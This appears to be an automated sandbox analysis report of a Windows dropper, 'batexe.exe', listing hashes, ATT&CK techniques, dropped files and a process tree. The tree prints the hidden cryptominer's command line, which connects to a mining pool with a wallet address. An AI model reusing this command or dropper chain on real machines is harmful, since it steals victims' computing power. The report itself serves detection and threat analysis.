73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
291s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 12:02

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3656	b2e.exe
2368	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
2368	cpuminer-sse2.exe
2368	cpuminer-sse2.exe
2368	cpuminer-sse2.exe
2368	cpuminer-sse2.exe
2368	cpuminer-sse2.exe
2368	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/708-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 708 wrote to memory of 3656	708	batexe.exe	85
PID 708 wrote to memory of 3656	708	batexe.exe	85
PID 708 wrote to memory of 3656	708	batexe.exe	85
PID 3656 wrote to memory of 4124	3656	b2e.exe	86
PID 3656 wrote to memory of 4124	3656	b2e.exe	86
PID 3656 wrote to memory of 4124	3656	b2e.exe	86
PID 4124 wrote to memory of 2368	4124	cmd.exe	89
PID 4124 wrote to memory of 2368	4124	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:708
- C:\Users\Admin\AppData\Local\Temp\37E4.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\37E4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\37E4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4580.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4124
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\37E4.tmp\b2e.exe

Filesize
7.9MB

MD5
7e9202ff573f28e10d67b81e0273fe7f

SHA1
3cbc8f6db6a928c0df0c77f6210c6d6979ef0cc9

SHA256
4e7346f181d045327f00636a0a0e64c4cb0a37adeb177e53cfe286de8ace4f7b

SHA512
c7273c3a3248234bbc3d172a336977282cf661542dba5d9f9fadcb0166235276cf0f8059ae6b26fee0ac35d495153fbc092992d7d0f67a8b07a86c738f4cdf44

Download Submit
C:\Users\Admin\AppData\Local\Temp\37E4.tmp\b2e.exe

Filesize
3.7MB

MD5
d21f9bcee0bdc7c287859ac525171332

SHA1
18cd6e8e22080a7c7cb5a4b182e38463c1843b87

SHA256
5014d5b17d3ca0bc125ad319d193ca5cd06dfc441fea703734e5de34d0f171a0

SHA512
4bd4086ba823c85283dbd8aa9ee1052c4dfc3b8fb8bc81174562bc86d147c541270b33f39f3214f0845e69db7c813e6ebfc6d31df23e2ad82d12df623b4e61e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\37E4.tmp\b2e.exe

Filesize
3.4MB

MD5
d71b8d3f4a5ed91f5953e22182d3545d

SHA1
0ae8b80eaa2350342ad465162167b7a7b2b708e2

SHA256
7784897651032862ef51e25f07a3ca75ec3ab562f2b948b986b9a77ea237d6a5

SHA512
72eb20f114423f6cf6d6f72ea3ec57196dca7de4de2ef190658a25091e9873a8fbee1919bb229bcb5b91fd5dfe19d46de632b4b6db7d8b3d281bf4ab91fc6de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\4580.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.0MB

MD5
34d984d4dccb4ad52a70644677012713

SHA1
ed55ec29f696b983af09e936c8191c7f9365beec

SHA256
c19082e247bd9a25de2c569108474587cd77d7e6d089f087c5dc426ff6ebe8db

SHA512
23cf0f25d0be50f5dba3cad5c32fb379d6a11d228f4b503099293d2c810789364b693eb8c99936b66a16662345c94f6d3b6fc4d7e8ea6c7bfacf97ccff215982

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
dfae2fd85b21407164b9263699b722a7

SHA1
51dfbff366923cfeaeee81899efe862709854720

SHA256
535c86e65e3a754dd6ed5ac9a82b3fd644db65f8fb55fecf3a5c684aa69f45f6

SHA512
fd89e7e40e89f962e8b30a805be29306b08d0bdbfd05bdb723aa93ee1a256674c1bb19b858e80fdbeeaab65d9d789e0b2ebd8a041b6ed28976bab695e3567983

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
832KB

MD5
9b527cc7775e3fefc75ebd6cf497b81b

SHA1
7405b4528854589bc404f55c0e591d2e534d8d63

SHA256
eb4270d5203fe07ee63a7161093d69577ada5ad4ca659a6181d63953a69bca72

SHA512
6471f61ebc78e6ab30cce7cb444c582a8a24cbcbff1a8cc3d22d20d299d53c6377127e76bcc2a1e2c9108cd65d6fb89d42ddf89b04140c8e225f5115984a4b85

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
662KB

MD5
8ab1843ff72b99192e0ed8567220d3ba

SHA1
245f6fbcf5b4c94887db8c6ba4fffd28ba72f10f

SHA256
14b0ec4fba7df1f42dd60df335352c3dca62e8801262cb869b93a6679634e8c3

SHA512
ebf068be4305a5320c4f0c28c837b31bbce1c86e5c129c2132d64b732bcea3c1be33a83f07eb40435e27091ce2b20a30280c70e88ea8186a343b2f4c8e59ba46

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
757KB

MD5
120f4528dec881c02157f1ce689e3bbe

SHA1
d078e26fd54716093c98a7d117b76ea5213187b3

SHA256
26d377020a2ae81318062e55935f0f971c4c06ea21fc91676b918fff779c5b54

SHA512
050480343e45059a3d3fce8f02c144077ff70cd0a69d261c0ed4258559b798d08085bdf29f18c3b5450ff3c331841740cb1206a8858ce97758262a8ce8c0a8df

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
975KB

MD5
f66a2931ccf5d39debf2bd71d595e8f9

SHA1
67dfd93394c396ce149f9a7cb585061ed07fa994

SHA256
6b5761d0959045abc8def85568d0e3660f224c900b8d69437f0562ed47ff2555

SHA512
d5ce575e328639c8c4bd90de23fe37b30f643c4d51dc7aefa79fde0438b680d9e04d356d146d16c68f674d59871cd397de9b1d353ba1af95ace96f9a8f1ec911

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
743KB

MD5
fec0787341e989b8f5caed3ff00ba7a6

SHA1
cb65f7efdc1346d792510c19d003717492343a13

SHA256
2169e938a4ea9513ebdf9a9934eabf076b64f344a9fe51caaa97eba980cf7998

SHA512
74793c8c923abeb0a3b5b923a3291596e64163e9bbbb982d543eec8dd47232daa1b16a40cabb02813127a89b9cec5f89254c1239e138f4783d7cce9e6a3e0c8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
607KB

MD5
58c7bfadf35933bd15dbd994166bc63a

SHA1
11e4af5e46b23183defd974862aa83de43756ca9

SHA256
39be5c05cab6c37b1f54e085243097866e2f2ffe06799b6f1973f98f7328fd8c

SHA512
ec4a6b53f6d98325bf0fee6a4d32e837d529e0b82969cc4960f3d228f4c9f324370c8684e46345bf6b49568033f91d90ca26d2b93d449be89a99a3b4c4b70d3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
855KB

MD5
1e34de2f47b57b5c98a7342464f41662

SHA1
f120f411d8554b3f2cd90eff6a0cd35363736171

SHA256
5a419676351e862900843d835d0bbac522dab28818ee27f5ab58d27e50532e0d

SHA512
469dc4a372b38507c614c811da8bcc51d3263f07d0b982f22acc8238605b96a7ffadb310e1a4c082afb8bb99e0ac411ef7b81563fe27cff6c70132eb746dee05

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
844KB

MD5
9a378b82503d73ed1b546fb3923e6ad7

SHA1
10cf768a44817ceded8db22abf1fc6442a563959

SHA256
5a06fcc6cf67e162170f2461f81738f7bdf7b967e28644eb1cf64c264832e367

SHA512
f8fd6c11b401a92ea360dbf7cdea4ed84e418e774021a58f34434058928d9755ce8d76945d1db77064071656dbc19b96051acce2ef8bf17120cf0203009007ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
26KB

MD5
15049b7887ecf7597751e1b868f05e2d

SHA1
4531885d92b17b9dd799507fdcfac88f0b68f564

SHA256
218d2eddb71c5787cc07fd9886ae477ff3ae8ab25e5389a8c7d0d70b71a30af5

SHA512
2a25975d8a285e8153c27a0862b35791103a7fb2193e4ed7f822bb7e862f3a4d379a4844adc5932d54034a3a85bf7c37c7105e6f94c0c246905b5082bbcdcfe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
13KB

MD5
b7f941aa8f266827aaeb701a09fc60ee

SHA1
53faa3b124563948866ee2ade698239323724222

SHA256
233d70e3e1683d8c62b4a60014c514c166cf5a7456d47832b03231f053bf6735

SHA512
7a9dd61816704c4bdf13b8d67800feedb7860ef9aeacec3c186cbdf2ae7017655a791bd699da859f6056497fcdfcd91a2952a5ef28f3a80db271e96359361d21

Download Submit
memory/708-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2368-49-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/2368-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/2368-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2368-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/2368-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/2368-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2368-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3656-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3656-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download